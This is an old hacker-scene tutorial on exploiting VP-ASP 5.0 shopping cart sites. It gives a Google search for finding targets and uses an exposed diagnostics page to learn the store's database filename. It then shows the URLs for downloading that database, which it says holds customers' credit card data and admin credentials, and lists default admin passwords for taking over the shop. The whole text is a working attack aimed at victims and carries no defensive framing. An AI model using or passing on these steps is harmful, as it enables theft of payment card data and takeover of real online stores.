VP-ASP Shopping Cart Version 5.0 Google style by fris <brokenimages@gmail.com>

Finding VP-ASP 5.00 Sites in Google:

In google type:

intitle:VP-ASP Shopping Cart 5.00

You will find many websites with VP-ASP 5.00 cart software installed

Now lets goto the exploit

the page will be like this:

****://***.victim.com/shop/shopdisplaycategories.asp

The exploit is : diag_dbtest.asp

so you want to do this:

****://***.victim.com/shop/diag_dbtest.asp

A page will appear that contains:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber

The most important thing here is xDatabase

xDatabase: shopping140

ok now the url will be like this:

****://***.victim.com/shop/shopping140.mdb

if you didn't download the db

try this while there is db location.

xDblocation
resx

the url will be:

****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you can try this:

****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file 
viewer, most people have ms access for you windows people, open office 
for you *nix people, or you can goto download.com and get a .mdb 
viewer.

inside the .mdb you should be able to find credit card information.
and you should even be able to find the admin username and password for 
the website.

the admin login page is usually located at

****://***.victim.com/shop/shopadmin.asp 

if you cannot find the admin username and password in the mdb file or you 
can but it is incorrect, or you cannot find the mdb file at all then try 
to find the admin login page and enter the default passwords which are

Username: admin
password: admin

or

Username: vpasp
password: vpasp

------

eof.

shouts out to mosthated, ghettodmx, evian s sim, ragz, TFreak, and Paige